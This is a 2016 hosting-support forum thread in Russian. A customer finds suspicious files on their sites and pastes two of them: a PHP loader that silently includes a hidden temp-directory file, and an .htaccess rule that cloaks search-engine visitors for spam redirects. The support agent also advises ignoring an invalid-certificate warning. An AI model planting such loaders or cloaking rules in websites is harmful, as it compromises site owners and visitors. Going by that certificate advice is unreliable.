Форум. Хостинг . появились файлы непонятные.Хостингова компанія Хостинг Україна

itradestorez 07.09.2016 17:57 0	здравствуйте, во всех сайтах появились такие файлы что с ними делать?) причем созданы они явно давно, но стали отображаться на днях cdn.adm.tools/forum_message/0398/96/Снимок экрана 2016-09-07 в 17.56.19.png
rudenko 07.09.2016 18:49 0	Приведите пример исходного кода файла index.php, возможно это вирус на сайте
itradestorez 07.09.2016 19:53 0	<?php error_reporting(0);ini_set("display_errors", 0);include_once(sys_get_temp_dir()."/SESS_48cd7517d21176f980daa5502d9efb31"); ?>
itradestorez 07.09.2016 19:54 0	htaccess <IfModule mod_rewrite.c> RewriteCond %{HTTP_USER_AGENT} (google\|yahoo\|msn\|aol\|bing) [OR] RewriteCond %{HTTP_REFERER} (google\|yahoo\|msn\|aol\|bing) RewriteRule ^.*$ index.php [L] </IfModule>
rudenko 07.09.2016 20:17 0	Смотрите дату создания файла и ищите в логах по этому времени и дате запросы, которые приходили на Ваш сайт. Скорее всего это хакерская атака.
itradestorez 07.09.2016 21:14 0	Вроде бы не вредоносные файлы, они появились сегодня Возможно у вас было какое-то обновление, и технические файлы из скрытых стали открыты для чтение через ftp? cdn.adm.tools/forum_message/0399/03/Screenshot_20160907-211351.png
rudenko 08.09.2016 14:25 0	Вроде бы не вредоносные файлы, они появились сегодня во всех четырех хостинг аккаунтах© itradestorez Наш антивирус не обнаруживает 100% вирусов, любой файл может быть результатом взлома, исходный код там очень странный, так как он подключает данные из сессии.
itradestorez 09.09.2016 02:42 0	посоветуйте пожалуйста чем лучше проверить тотально все хостинги? файлы эти я удалил, все работает как и прежде, ничего не отвалилось, значит они были не системные и появились непонятно откуда
itradestorez 09.09.2016 03:10 0	пытаюсь перевести все подключения на FTP + TSL/SSL пишет что сертификат invalid если нажать continue то подключение проходит, но оно получается не защищено? по SFTP вообще не захотел подключатся хотя и порт менял на 22 (или надо другой какой-то?)
rudenko 09.09.2016 19:02 0	пытаюсь перевести все подключения на FTP + TSL/SSL пишет что сертификат invalid© itradestorez Подключение зашифровано, все ок. Не стоит обращать внимание на это предупреждение.
rudenko 09.09.2016 19:04 0	посоветуйте пожалуйста чем лучше проверить тотально все хостинги?© itradestorez Только ручками, универсального антивируса для php кода нет. Нужно проделывать то, что я описал в начале темы. Скорее всего через уязвимость в CMS залили какой-то shell, но он оказался нерабочим, так как у нас на хостинге не стандартное размещение папок и нет public_html и прочих директорий.
itradestorez 09.09.2016 19:08 0	Спасибо за консультацию, будем поглядеть что будет дальше, ручками искать не вариант, десятки тысяч файлов :(
rudenko 09.09.2016 19:12 0	Спасибо за консультацию, будем поглядеть что будет дальше, ручками искать не вариант, десятки тысяч файлов :(© itradestorez Хоть миллион, по дате и точному времени создания вирусного файла находите запрос в логах, и видите откуда он прилетел. Если повториться - напишите на форуме, я посмотрю.
itradestorez 10.09.2016 03:07 0	не знаю как в личку скинуть, в общем сайт mariavasilenko.ru весь в этих файлах непонятных и сегодня обнаружил порнотрафик на сайт хотя если из поиска перейти на эту страницу, то никакого адалта там нет, странно я уверен на 100% проблема идет с этого сайта, но как найти где именно этот вирус среди 1000 php файлов :( [[upload]Снимок экрана 2016-09-10 в 3.05.16.png[[/upload]] [[upload]Снимок экрана 2016-09-10 в 3.05.03.png[[/upload]]

Тема закрита.